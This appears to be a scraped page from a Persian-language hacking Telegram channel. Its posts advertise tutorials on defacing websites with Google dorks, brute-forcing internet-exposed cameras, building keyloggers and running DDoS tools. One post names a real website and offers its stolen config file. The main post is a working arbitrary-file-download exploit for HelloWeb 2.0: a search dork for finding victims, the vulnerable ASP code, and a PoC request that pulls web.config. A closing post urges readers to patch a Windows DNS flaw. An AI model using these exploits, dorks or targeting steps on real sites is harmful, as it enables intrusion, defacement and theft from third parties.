0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
ابزار Shodonwave برای جستجو، بروت فورس و اکسپلویت کردن دوربین های مداربسته موجود در اینترنت با استفاده از موتور جستجوی shodan

Github Link

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (2)

Site

#Deface #shell #dork #google_dork

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Target #Config #File :)

#Target :
batikkratonmas.com

#Config File :
Download


Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
آموزش ساخت پسورد لیست با ابزار قدرتمند crunch در کالی لینوکس

#kali #linux #password #passlist #crunch

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (3)

#Deface #shell #dork #google_dork

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه

با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.

ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir رو‌ندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link

#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )

#Dork : ( Inurl:exec/file/download.asp )

#vulnerable-Code :

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")

root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)

attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open

objStream.Type = 1
objStream.LoadFromFile attachfile

Response.BinaryWrite objStream.Read
Response.Flush

طبق کد های مد نظر! این کد ها دسترسی دانلود فایل رو‌برای ما میده.
پارامتر هایی که اسیب‌پذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile

چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf

در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...

نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک‌ سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
رو‌به اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو‌ با پارامتر متفاوت تست کنید.

#PoC
تست :
این تست روی لوکال هاست صورت گرفته.

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close

نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4

IR0Day.Today Guy's
@LearnExploit
@Tech_Army
آموزش ساخت کیلاگر با ابزار Hatkey در کالی لینوکس

نوشته شده با پایتون

#Keylogger

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (4)

#Deface #shell #dork #google_dork

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ddos/dos با ابزار hammer در کالی لینوکس

Github Link

#ddos #dos #tools #kali #linux

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#فوری #مهم

خیلی فوری: سازمان‌ها و شرکت‌های ایرانی حواسشون باشه که یه آسیب‌پذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساخت‌تون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا به‌روزرسانی‌هارو انجام بدید.

منبع : آفسک

iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army